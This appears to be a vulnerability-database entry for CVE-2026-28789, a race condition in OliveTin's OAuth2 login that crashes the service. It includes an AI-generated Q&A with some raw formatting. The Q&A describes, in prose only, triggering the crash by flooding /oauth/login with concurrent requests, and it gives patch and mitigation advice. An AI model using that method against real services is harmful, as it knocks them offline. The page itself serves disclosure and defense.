CVE-2026-28789
Unauthenticated DoS via OAuth2 Login Race in OliveTin
Publication date: 2026-03-05
Last updated on: 2026-03-10
Assigner: GitHub, Inc.
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| olivetin | olivetin | to 3000.10.2 (inc) |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-400 | The product does not properly control the allocation and maintenance of a limited resource. |
| CWE-362 | The product contains a concurrent code sequence that requires temporary, exclusive access to a shared resource, but a timing window exists in which the shared resource can be modified by another code sequence operating concurrently. |
| CWE-662 | The product utilizes multiple threads, processes, components, or systems to allow temporary access to a shared resource that can only be exclusive to one process at a time, but it does not properly synchronize these actions, which might cause simultaneous accesses of this resource by multiple threads or processes. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
[{'type': 'paragraph', 'content': "CVE-2026-28789 is a vulnerability in OliveTin's OAuth2 login flow where concurrent requests to the /oauth/login endpoint cause unsynchronized access to a shared map named registeredStates. This map tracks OAuth2 login states but lacks proper synchronization, leading to concurrent map writes."}, {'type': 'paragraph', 'content': "Because Go's HTTP handlers run concurrently, multiple simultaneous requests can trigger a race condition that causes a runtime panic with the error 'fatal error: concurrent map writes'. This panic crashes the OliveTin service process, resulting in a denial-of-service (DoS) condition."}, {'type': 'paragraph', 'content': 'The vulnerability is unauthenticated and can be exploited remotely by sending many concurrent requests to the OAuth2 login endpoint. It was fixed by adding mutex locks to synchronize access to the shared map, preventing concurrent writes and ensuring thread safety.'}] [1, 2]
How can this vulnerability impact me? :
This vulnerability can cause the OliveTin service to crash unexpectedly when OAuth2 login is enabled and the /oauth/login endpoint receives concurrent requests.
An attacker can exploit this remotely without authentication by sending many simultaneous requests, triggering a race condition that leads to a runtime panic and process termination.
The impact is a denial-of-service (DoS) condition, causing loss of availability of the OliveTin service until it is manually restarted or recovered.
- No confidentiality or integrity impact.
- High availability impact due to service crashes.
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:
I don't know
How can this vulnerability be detected on my network or system? Can you suggest some commands?
[{'type': 'paragraph', 'content': 'This vulnerability can be detected by monitoring for crashes or runtime panics in the OliveTin service related to concurrent map writes in the OAuth2 login flow.'}, {'type': 'paragraph', 'content': 'Specifically, look for log entries indicating a Go runtime panic with the error message "fatal error: concurrent map writes" originating from the OAuth2 handler code.'}, {'type': 'paragraph', 'content': 'A practical detection method involves sending a high volume of concurrent HTTP requests to the /oauth/login endpoint and observing if the service crashes or logs the fatal error.'}, {'type': 'paragraph', 'content': 'For example, using a tool like curl or a custom script to generate concurrent requests to /oauth/login can help reproduce the issue if the service is vulnerable.'}, {'type': 'list_item', 'content': 'Use a command or script to send many concurrent requests to the /oauth/login endpoint, such as a Python script with multiple workers.'}, {'type': 'list_item', 'content': 'Monitor the OliveTin service logs for runtime panics or fatal errors mentioning "concurrent map writes".'}, {'type': 'list_item', 'content': 'Check the service status to see if it crashes or terminates unexpectedly after such requests.'}] [2]
What immediate steps should I take to mitigate this vulnerability?
The immediate mitigation step is to upgrade OliveTin to version 3000.10.3 or later, where the vulnerability has been patched.
The patch introduces proper concurrency control using mutex locks to prevent concurrent map writes in the OAuth2 login flow.
If upgrading immediately is not possible, consider disabling OAuth2 login functionality temporarily to prevent exploitation.
Additionally, monitor the service for crashes and restart it if necessary until the patch can be applied.